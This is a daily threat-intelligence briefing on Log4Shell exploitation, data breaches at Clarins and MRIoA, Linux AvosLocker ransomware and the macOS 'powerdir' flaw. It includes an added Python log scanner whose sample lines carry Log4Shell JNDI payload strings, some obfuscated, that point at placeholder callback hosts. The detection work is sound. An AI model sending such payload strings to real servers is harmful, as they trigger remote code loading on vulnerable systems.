Cyware Daily Threat Intelligence

Daily Threat Briefing • Jan 11, 2022
Today’s threat intelligence briefing has Log4Shell written all over it. APT35, aka Charming Kitten, is the latest threat group seen exploiting one of the Log4Shell flaws, in this case to deliver a new PowerShell-based modular backdoor dubbed CharmPower. The same critical flaws were behind a breach at Clarins, which exposed the personal information of its Singapore customers online. More worrying still, despite the availability of patched releases, vulnerable, outdated versions of Log4j were downloaded four million times in a single month.
Ransomware is never far from the headlines, and today a new Linux variant of AvosLocker is in the news for encrypting VMware ESXi hosts after shutting down the virtual machines running on them.
Top Breaches Reported in the Last 24 Hours
Clarins hit by a data breach
French cosmetics company Clarins has suffered a data breach affecting the personal information of its Singapore customers. The intrusion was possible because the company had not patched the Log4Shell vulnerabilities in time. Clarins became aware of the breach after a staff member was unable to access a database. The affected data includes customers’ names, addresses, email addresses, phone numbers, and loyalty program status.
MRIoA discloses a data breach
The Medical Review Institute of America (MRIoA) has notified some 134,000 individuals of a data breach affecting their personal information. The incident was discovered on November 9, 2021. The compromised data includes names, gender, email addresses, phone numbers, dates of birth, Social Security numbers, and financial information of the affected individuals.
Top Malware Reported in the Last 24 Hours
New AvosLocker variant spotted
Researchers have spotted a new Linux version of the AvosLocker ransomware that targets VMware ESXi servers. Once launched on a Linux host, the ransomware first terminates all ESXi virtual machines running on the server, so that their disk files are no longer locked, then encrypts the files and appends the .avoslinux extension to each encrypted file.
Top Vulnerabilities Reported in the Last 24 Hours
Exploitation of Log4Shell
The Charming Kitten threat actor group attempted to exploit one of the Log4Shell vulnerabilities (CVE-2021-44228) to deliver a new PowerShell-based modular backdoor dubbed CharmPower. As the first stage of the infection chain, the attackers used a publicly available JNDI exploit kit to send a crafted request containing a JNDI lookup string to a publicly facing resource of the victim.
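The detection check a defender wants for the activity described above is a scan of web-server logs for Log4Shell-style JNDI lookup strings, including the nested-lookup forms (`${${lower:j}ndi:...}`, `${::-j}`, `${env:X:-j}`) that exploit kits use to slip past a naive `${jndi:` match. The following Python is an added example for this briefing, not code from Cyware or from the reported research; the log lines are constructed samples, and the host addresses in them are documentation ranges, not real infrastructure.

```python
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines (not real traffic). Lines 1-3 carry a
# JNDI lookup in a commonly logged field (User-Agent, request path, a custom
# header); line 4 disguises "jndi" with nested lookups; lines 5-6 are benign,
# the last one containing a harmless ${...} template variable.
SAMPLE_LOGS = [
    '10.0.0.5 - - [11/Jan/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.6 - - [11/Jan/2022:10:01:05 +0000] "GET /${jndi:rmi://203.0.113.11:1099/Exploit} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.7 - - [11/Jan/2022:10:01:09 +0000] "POST /api HTTP/1.1" 200 17 "-" "Mozilla/5.0" X-Api-Version: "${jndi:dns://203.0.113.12/x}"',
    '10.0.0.8 - - [11/Jan/2022:10:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}${lower:d}i:${lower:l}dap://203.0.113.13:1389/b}"',
    '10.0.0.9 - - [11/Jan/2022:10:02:20 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.10 - - [11/Jan/2022:10:02:25 +0000] "GET /status?template=${name} HTTP/1.1" 200 20 "-" "health-check/1.0"',
]

# A ${...} whose body contains no further ${ or }: the innermost lookup.
INNER_LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")
# The payload we are looking for after nesting has been folded away.
JNDI_RE = re.compile(r"\$\{\s*jndi:\s*([a-z0-9+.-]+)://([^}\s/]+)", re.IGNORECASE)


def _resolve_inner(m: "re.Match") -> str:
    """Statically evaluate one innermost Log4j-style lookup where possible."""
    body = m.group(1)
    key, sep, arg = body.partition(":")
    k = key.strip().lower()
    if k == "jndi":                 # the payload itself: keep it for JNDI_RE
        return m.group(0)
    if ":-" in body:                # default-value operator: ${anything:-X} -> X
        return body.split(":-", 1)[1]
    if sep and k == "lower":        # ${lower:J} -> j
        return arg.lower()
    if sep and k == "upper":        # ${upper:j} -> J
        return arg.upper()
    return m.group(0)               # unknown lookup: leave it in place


def normalize(s: str, max_rounds: int = 20) -> str:
    """Fold nested lookups from the inside out until the string is stable."""
    for _ in range(max_rounds):
        folded = INNER_LOOKUP_RE.sub(_resolve_inner, s)
        if folded == s:
            break
        s = folded
    return s


def scan_line(line: str) -> Optional[Dict]:
    """Return details of a JNDI lookup found in the line, or None."""
    m = JNDI_RE.search(normalize(line))
    if not m:
        return None
    return {
        "scheme": m.group(1).lower(),          # ldap, rmi, dns, ...
        "target": m.group(2),                  # attacker callback host[:port]
        "obfuscated": "${jndi:" not in line.lower(),  # only visible after folding
    }


def scan_logs(lines: List[str]) -> List[Dict]:
    """Scan log lines; each hit carries its 1-based line number."""
    hits = []
    for n, line in enumerate(lines, 1):
        hit = scan_line(line)
        if hit:
            hit["line_no"] = n
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for h in scan_logs(SAMPLE_LOGS):
        print(f"line {h['line_no']}: jndi:{h['scheme']} -> {h['target']}"
              f"{' (obfuscated)' if h['obfuscated'] else ''}")
```

The `target` field is the attacker-controlled callback host that the vulnerable Log4j instance would connect to, which is the value worth pushing straight to an egress block list; the `obfuscated` flag separates the hits a plain `${jndi:` grep would already have caught from those it would have missed. The folding covers only the `lower`, `upper` and default-value (`:-`) constructs; other Log4j lookups are left in place, so the check is a triage aid rather than a substitute for patching Log4j.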
Apple fixes ‘powerdir’ flaw
Microsoft has shared details of a vulnerability in Apple’s macOS that could let an attacker gain unauthorized access to protected user data by bypassing the operating system’s Transparency, Consent, and Control (TCC) mechanism. Named ‘powerdir’ and tracked as CVE-2021-30970, the flaw was fixed by Apple in December 2021.